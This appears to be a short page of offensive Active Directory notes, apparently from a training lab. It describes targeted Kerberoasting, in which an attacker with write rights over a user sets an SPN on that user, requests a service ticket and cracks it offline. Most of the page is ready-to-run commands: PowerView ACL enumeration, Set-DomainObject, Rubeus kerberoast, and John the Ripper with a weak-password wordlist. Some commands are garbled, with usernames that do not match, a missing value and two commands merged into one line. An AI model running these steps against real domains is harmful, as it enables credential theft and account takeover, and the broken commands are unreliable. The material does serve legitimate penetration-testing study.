Once an account has an SPN, it becomes vulnerable to Kerberoasting.

This abuse can be carried out when controlling an object that has a GenericAll, GenericWrite, WriteProperty or Validated-SPN over the target. A member of the Account Operator group usually has those permissions.

The attacker can add an SPN (ServicePrincipalName) to that account. Once the account has an SPN, it becomes vulnerable to Kerberoasting.

Targeted Kerberoasting - Set SPN

  • With GenericAll or GenericWrite, a target user's SPN can be set to anything that is unique in the forest.

  • We can request a TGS without special privilges. The TGS can be Kerberoasted.

Enumerate permissions for RDPUsers on ACLs using PowerView:

Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "RDPUsers"}

Check if the user already has a SPN set:

# Powerview
Get-DomainUser -Identity supportuser | select serviceprincipalname

# AD module
Get-ADUser -Identity supportuser -Properties ServicePrincipalName | select ServicePrincipalName

Set SPN for the user

# Powerview
Set-DomainObject -Identity support1user -Set @{serviceprincipalname=‘dcorp/whatever1'}

# AD module
Set-ADUser -Identity support1user -ServicePrincipalNames

Kerberoast the user:

Rubeus.exe kerberoast /outfile:targetedhashes.txt john.exe --wordlist=C:\AD\Tools\kerberoast\10k-worst-pass.txt C:\AD\Tools\targetedhashes.txt

Last updated